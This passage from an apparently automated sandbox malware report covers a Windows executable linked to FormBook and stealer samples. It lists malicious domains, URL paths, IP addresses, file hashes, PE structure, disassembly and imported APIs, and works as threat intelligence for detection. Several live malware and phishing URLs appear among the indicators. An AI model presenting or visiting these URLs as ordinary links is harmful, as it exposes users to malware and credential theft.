                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 85%
                                                                    • Number of executed functions: 96
                                                                    • Number of non-executed functions: 303
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    03:11:18API Interceptor9286861x Sleep call for process: chkntfs.exe modified
                                                                    09:09:50Task SchedulerRun new task: {2370E142-543F-4375-8827-EC51F4A2CECD} path:

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    47.83.1.90QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • www.givvjn.info/nkmx/
                                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                    • www.givvjn.info/nkmx/
                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • www.givvjn.info/nkmx/
                                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.cruycq.info/6jon/
                                                                    DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cruycq.info/mywm/
                                                                    Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                    • www.adadev.info/ctdy/
                                                                    Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                    • www.adadev.info/ctdy/
                                                                    SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cruycq.info/lf6y/
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gayhxi.info/jfb9/
                                                                    192.64.119.109ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.laduta.xyz/5mxq/
                                                                    76.223.67.189236236236.elfGet hashmaliciousUnknownBrowse
                                                                    • dubai.degree/
                                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                    • www.mjmegartravel.online/t2sm/
                                                                    RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                    • www.mjmegartravel.online/t2sm/
                                                                    8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php
                                                                    WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                    • qexyhuv.com/login.php

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.laduta.xyzORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 192.64.119.109
                                                                    www.overlayoasis.questDHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.148.216
                                                                    www.mzkd6gp5.topQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.32.1
                                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.96.1
                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.64.1
                                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.158.81

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    NAMECHEAP-NETUShttps://delivery-pack.com/checkout/?add-to-cart=12Get hashmaliciousUnknownBrowse
                                                                    • 63.250.43.146
                                                                    https://clinicasanclemente.com/ap/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 68.65.120.84
                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    http://hikingandadventures.com/inv/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                    • 68.65.120.220
                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    http://thehalobun.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 192.64.119.54
                                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 192.64.119.109
                                                                    DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    AMAZON-02UShttps://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 52.211.89.170
                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                    • 18.151.37.43
                                                                    http://www.jmclmedia.phGet hashmaliciousUnknownBrowse
                                                                    • 13.32.121.98
                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                    • 34.248.106.44
                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                    • 13.213.186.124
                                                                    https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005Get hashmaliciousUnknownBrowse
                                                                    • 65.9.66.13
                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                    • 3.65.161.32
                                                                    https://paybxss.716as7qy3nzyy2eo1omfskt9q0wrkj88.oastify.com/Get hashmaliciousUnknownBrowse
                                                                    • 3.248.33.252
                                                                    https://rachelfix-enum.staging-homes.rewiringamerica.org/Get hashmaliciousUnknownBrowse
                                                                    • 18.245.86.4
                                                                    https://db.nemovault.com/Get hashmaliciousUnknownBrowse
                                                                    • 3.74.237.181
                                                                    CLOUDFLARENETUShttps://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.74.232
                                                                    http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                    • 188.114.96.3
                                                                    https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                    • 104.26.1.150
                                                                    https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    http://www.jmclmedia.phGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    Invoice_R6GPN23V_TransactionSuccess.html.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005Get hashmaliciousUnknownBrowse
                                                                    • 188.114.96.3
                                                                    https://blacktrunkstore.com/Get hashmaliciousUnknownBrowse
                                                                    • 104.19.230.21
                                                                    https://rachelfix-enum.staging-homes.rewiringamerica.org/Get hashmaliciousUnknownBrowse
                                                                    • 104.26.0.188
                                                                    VODANETInternationalIP-BackboneofVodafoneDE5.elfGet hashmaliciousUnknownBrowse
                                                                    • 88.79.50.180
                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                    • 178.10.231.77
                                                                    armv4l.elfGet hashmaliciousUnknownBrowse
                                                                    • 88.68.235.154
                                                                    Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 188.101.106.73
                                                                    Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                    • 188.97.99.47
                                                                    Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 188.110.169.89
                                                                    sora.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 2.205.253.121
                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                    • 47.83.1.90
                                                                    QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                    • 47.83.1.90
                                                                    4.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.85.248.172

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\721e5H878

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\chkntfs.exe
                                                                    File Type:Unknown
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\reindulging

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\1162-201.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):290816
                                                                    Entropy (8bit):7.993414361799452
                                                                    Encrypted:true
                                                                    SSDEEP:6144:Xg81IqdH904SJgZ6NF1lW8zEpqi9cyCTTvLg7YEOmj2lga78ytrmc:Xg8VzBSJgZy1Q8o0TvxEPaaaFrL
                                                                    MD5:A16B0681F89209738D9E0831D233A203
                                                                    SHA1:42E176270516C9BE7795631BCB496A6271D69CBD
                                                                    SHA-256:264A11118D0EEE66D0F3FBC9A5C79EED9C953219A7E012EB99BE7C99A8AE44C7
                                                                    SHA-512:3CB89F1D05EF3BDCBAF6888905DED4B23DE9C942D92566D914645E33E4EE6F17CA7CD73C534CFCC4DDF23BEBC38EA020FC857008D269E1DE6ED86D4363E35A46
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.m.OB2ALVEMD..E7.I7JOA2A.REMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALR.MDDHZ.[I.C.`.@..d.,-5eG'&P8.,."-<+"0d$ .'<Yj&/....e + #k:XC.JOA2ALR<LM.{%P.tW-.|R&.H..~&".O.s!U.V..x$!.e<*_w/&.ALREMDDF.rUI{KNAn..EMDDFE7U.7HNJ3JLR.IDDFE7UI7J.S2ALBEMD4BE7U.7J_A2ANREKDDFE7UI1JOA2ALRE=@DFG7UI7JOC2..RE]DDVE7UI'JOQ2ALREMTDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2Ab& 50DFEc.M7J_A2A.VEMTDFE7UI7JOA2ALReMD$FE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDFE7UI7JOA2ALREMDDF

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.421622390695377
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:1162-201.exe
                                                                    File size:1'618'432 bytes
                                                                    MD5:334085b11d8f0dcad01bb1c6414acc91
                                                                    SHA1:a6c57fab8877a751fc8da1fa0a2a5483f706d43f
                                                                    SHA256:c4b0ffc82218c157054043b17c17295dc2117b3ddf54f78c6480a0f0f45fb070
                                                                    SHA512:086927e1977219ee04ef1f168f1f722e20595c8d244e031f0e9ad5af2948544d1070cc479bff22d97711373ff7e19cf250e8485b2e3b9c6ea80267889e6e90fe
                                                                    SSDEEP:24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8aYW9/B66CzmtDRs98wsQSv4qG3:XTvC/MTQYxsWR7aYE/B66xK98wsQSk
                                                                    TLSH:9175E10273D1D022FF9BA2734B5AF6115ABC7A260123E61F13981DB9BE701B1563E763
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                    File Icon

                                                                    Icon Hash:aaf3e3e3938382a0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x420577
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x677F3174 [Thu Jan 9 02:16:20 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007FFB3103E893h
                                                                    jmp 00007FFB3103E19Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007FFB3103E37Dh
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007FFB3103E34Ah
                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    and dword ptr [eax], 00000000h
                                                                    and dword ptr [eax+04h], 00000000h
                                                                    push eax
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    add eax, 04h
                                                                    push eax
                                                                    call 00007FFB31040F3Dh
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    lea eax, dword ptr [ecx+04h]
                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                    push eax
                                                                    call 00007FFB31040F88h
                                                                    pop ecx
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    push eax
                                                                    call 00007FFB31040F71h
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb4734.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1890000x7594.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xd40000xb47340xb4800e36863623da164c21a2d45769f7ffac7False0.9637752120844876data7.963063195326604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x1890000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xdc7b80xab9fcdata1.0003143795200946
                                                                    RT_GROUP_ICON0x1881b40x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x18822c0x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x1882400x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x1882540x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x1882680xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x1883440x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                    Imports

                                                                    DLLImport
                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, 